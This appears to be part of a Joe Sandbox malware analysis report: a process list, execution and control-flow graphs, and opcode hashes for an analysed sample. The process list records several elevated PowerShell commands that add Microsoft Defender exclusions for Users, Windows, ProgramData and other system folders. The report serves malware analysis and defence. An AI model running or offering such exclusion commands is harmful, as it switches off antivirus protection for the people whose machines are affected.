                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:65
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:66
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:67
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:68
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:69
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:70
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:71
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:72
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:73
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:74
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:75
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:76
                                                                                                Start time:14:37:26
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:77
                                                                                                Start time:14:37:27
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:78
                                                                                                Start time:14:37:27
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:79
                                                                                                Start time:14:37:37
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                File size:55'320 bytes
                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:3.4%
                                                                                                  Dynamic/Decrypted Code Coverage:75%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:12
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 11902 7ff848fb2395 11903 7ff848fb23af GetFileAttributesW 11902->11903 11905 7ff848fb2475 11903->11905 11906 7ff848fb0548 11907 7ff848fb0583 ResumeThread 11906->11907 11909 7ff848fb0654 11907->11909 11910 7ff848fb06a9 11911 7ff848fb06b7 CloseHandle 11910->11911 11913 7ff848fb0794 11911->11913 11898 7ff848faed7d 11899 7ff848faed8b SuspendThread 11898->11899 11901 7ff848faee64 11899->11901

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 104 7ff848df0d67-7ff848df0d7f 105 7ff848df0d82-7ff848df0db9 104->105 106 7ff848df0d81 104->106 108 7ff848df0dc0-7ff848df0e4c call 7ff848df07d0 105->108 109 7ff848df0dbb 105->109 106->105 121 7ff848df0e4d-7ff848df0ebe 108->121 109->108 126 7ff848df0ec0-7ff848df0fa3 121->126 136 7ff848df0fab-7ff848df109c 126->136
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 10 7ff848faed7d-7ff848faed89 11 7ff848faed94-7ff848faee62 SuspendThread 10->11 12 7ff848faed8b-7ff848faed93 10->12 16 7ff848faee64 11->16 17 7ff848faee6a-7ff848faeeb4 11->17 12->11 16->17
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: SuspendThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3178671153-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 20 7ff848fb2395-7ff848fb2473 GetFileAttributesW 24 7ff848fb2475 20->24 25 7ff848fb247b-7ff848fb24b9 20->25 24->25
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 27 7ff848fb06a9-7ff848fb06b5 28 7ff848fb06c0-7ff848fb0792 CloseHandle 27->28 29 7ff848fb06b7-7ff848fb06bf 27->29 33 7ff848fb0794 28->33 34 7ff848fb079a-7ff848fb07ee 28->34 29->28 33->34
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2962429428-0

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5H
                                                                                                  • API String ID: 0-1325928868

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5H
                                                                                                  • API String ID: 0-1325928868

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 227c9e8e1b154f2e2df819b3892a1726f538a572a87684d9170be3faa4257913
                                                                                                  • Instruction ID: 0e87b8e2b949fa7498bad5377afe73d1af6f78bee453f983734ee4c36e4f7504
                                                                                                  • Opcode Fuzzy Hash: 227c9e8e1b154f2e2df819b3892a1726f538a572a87684d9170be3faa4257913
                                                                                                  • Instruction Fuzzy Hash: 18018C70E0E68A8FE702BB6488142E97BB0EF42350F0845B2D245DB2D2DF386908D759
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 44cd5d67510f6816c88c2b190c67f9496edb665499dfe7c3857109918458377d
                                                                                                  • Instruction ID: 3353fffe8f8530d72c799cbcec9f07b497bb64de9d7d41b45b897bf443b6d321
                                                                                                  • Opcode Fuzzy Hash: 44cd5d67510f6816c88c2b190c67f9496edb665499dfe7c3857109918458377d
                                                                                                  • Instruction Fuzzy Hash: CDF0A470918A4D9FDF84EF58C488AAA7BE0FF28344F5045A6F819C7260DB30E5A0CB85
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3160e6e0328d2032003b4aec6bfb797262845d8efdde97b805d2eeb8b6af0af9
                                                                                                  • Instruction ID: 388ac126a1d614a1f274d51813c5902b68c87dddf4454449fe08f6eb893c1f0c
                                                                                                  • Opcode Fuzzy Hash: 3160e6e0328d2032003b4aec6bfb797262845d8efdde97b805d2eeb8b6af0af9
                                                                                                  • Instruction Fuzzy Hash: 3601DA70D4A52A8FDB69AF00CC447B877B5EB50345F4000F9D249A7292CB786A88DF08
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bec1f0a460955b41858968c0e445b3ad95268f63a050a1f25ebb8d0e22fd0e5c
                                                                                                  • Instruction ID: 009d018c5ea274e3eb2c1f5d2bdd51af06c4f1567071aa36ee170c19201c034d
                                                                                                  • Opcode Fuzzy Hash: bec1f0a460955b41858968c0e445b3ad95268f63a050a1f25ebb8d0e22fd0e5c
                                                                                                  • Instruction Fuzzy Hash: 5FF0DA7090E5198EEB64AB54D8447EDB7B0EB48304F1450A8D64EA3281DB386AC9DF1A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d1eb5ea2ada23c1691d6c95f853c7788448ecfb8c3ef306934c5b0939286c3a
                                                                                                  • Instruction ID: 49b5fff55d4defc63970016cb2d8545a89026e0bb03050e22d36b4f586c5360e
                                                                                                  • Opcode Fuzzy Hash: 2d1eb5ea2ada23c1691d6c95f853c7788448ecfb8c3ef306934c5b0939286c3a
                                                                                                  • Instruction Fuzzy Hash: 2AF08C30D0945A8BEBA9EA18C8542AD77B2EF80740F0041F1E10CA7282CE341E8A9F44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: E%Gt$Mj,^$cm-4
                                                                                                  • API String ID: 0-4201283925
                                                                                                  • Opcode ID: d91fbff3bf7bf955a0c120c46e2a52f4313dceac89b4f442c80c360fdf8e2892
                                                                                                  • Instruction ID: 3c66e30625f006692c19bd3772189e9c6971c2ebfd9207e1f16466f330795a8d
                                                                                                  • Opcode Fuzzy Hash: d91fbff3bf7bf955a0c120c46e2a52f4313dceac89b4f442c80c360fdf8e2892
                                                                                                  • Instruction Fuzzy Hash: BE43D570A146298FDB98EB18C895BA9B7B2FF48340F5041F9D40EA7296DF356E84CF44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3_^
                                                                                                  • API String ID: 0-3162662871
                                                                                                  • Opcode ID: b8f531aa6ecc26245a76fc2f61cf5bd041e9584a337aa5cf89336c19dbf100a6
                                                                                                  • Instruction ID: a5afcbcbf8fabc513efce9a949d742da2dd97430cba3cece894c992cb6345322
                                                                                                  • Opcode Fuzzy Hash: b8f531aa6ecc26245a76fc2f61cf5bd041e9584a337aa5cf89336c19dbf100a6
                                                                                                  • Instruction Fuzzy Hash: 93512472D0DB865EE302EB78D8951E57FA0EF026A4F0841B7C088CB1D3DE19A45983A9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2265679344.00007FF848FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848fa0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 511358ee0036c1bccd2acc9c3997f1fc7bbab068ec84cf1280aa32cdc13baf54
                                                                                                  • Instruction ID: 5f6e084bba84326c9d5e2e58bc0ff24b1e1a212b78d059f67767884e300444c0
                                                                                                  • Opcode Fuzzy Hash: 511358ee0036c1bccd2acc9c3997f1fc7bbab068ec84cf1280aa32cdc13baf54
                                                                                                  • Instruction Fuzzy Hash: 9131F274E08A1D8FCF84EF98C491AEDBBF1FB69300F2011AAD419E3281DB75A941CB44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2263521759.00007FF848DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848df0000_d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c9$!k9$"s9$#{9
                                                                                                  • API String ID: 0-1692736845
                                                                                                  • Opcode ID: 8c05fa64b355bbab230c1bf53ec5e43b77c1c048ce689dd8d9f65ece65887cd1
                                                                                                  • Instruction ID: 68171e0d0824c5f1dd6333ab2bf3ea106258812d03f7df93060c9671b1400e31
                                                                                                  • Opcode Fuzzy Hash: 8c05fa64b355bbab230c1bf53ec5e43b77c1c048ce689dd8d9f65ece65887cd1
                                                                                                  • Instruction Fuzzy Hash: A2414017B1E9626EF11232BE70016FD6F44EF812B9F484677E24C8A9875F08658682FD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2158e3d734bbe7f99bbd5f994b6fd9aa5da79a60f924a312342873aff20d9237
                                                                                                  • Instruction ID: adf11aa0848e413c6c7439925ff5a67b1eea2c330dcfdfc95a64b2d17d4d2acd
                                                                                                  • Opcode Fuzzy Hash: 2158e3d734bbe7f99bbd5f994b6fd9aa5da79a60f924a312342873aff20d9237
                                                                                                  • Instruction Fuzzy Hash: 91A11F7191CA898FE788EB68C8693B97FE2FB56350F4401BAC00CD72D2CB791855CB91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5H
                                                                                                  • API String ID: 0-1325928868
